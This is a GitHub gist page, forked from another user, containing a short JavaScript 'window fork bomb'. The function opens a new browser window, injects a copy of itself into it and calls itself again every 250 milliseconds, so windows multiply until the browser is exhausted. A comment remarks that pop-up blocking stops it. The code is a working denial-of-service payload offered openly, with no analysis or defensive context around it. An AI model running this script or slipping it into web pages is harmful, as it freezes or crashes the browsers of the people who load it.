Skip to content

Instantly share code, notes, and snippets.

@geanfarias
Forked from wlib/windowForkBomb.js
Created December 10, 2021 14:52
Show Gist options
  • Save geanfarias/a8a108cd244b67ec76fa1290a855293e to your computer and use it in GitHub Desktop.
Save geanfarias/a8a108cd244b67ec76fa1290a855293e to your computer and use it in GitHub Desktop.
JS window fork bomb
// Make sure to allow pop ups, or your browser will stop the window.open() (thankfully)
function fork() {
const win = window.open();
const script = win.document.createElement("script");
script.innerHTML = fork + "\n" + "fork();";
win.document.head.appendChild(script);
setTimeout(function() {
win.close();
fork();
}, 250)
}
fork();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment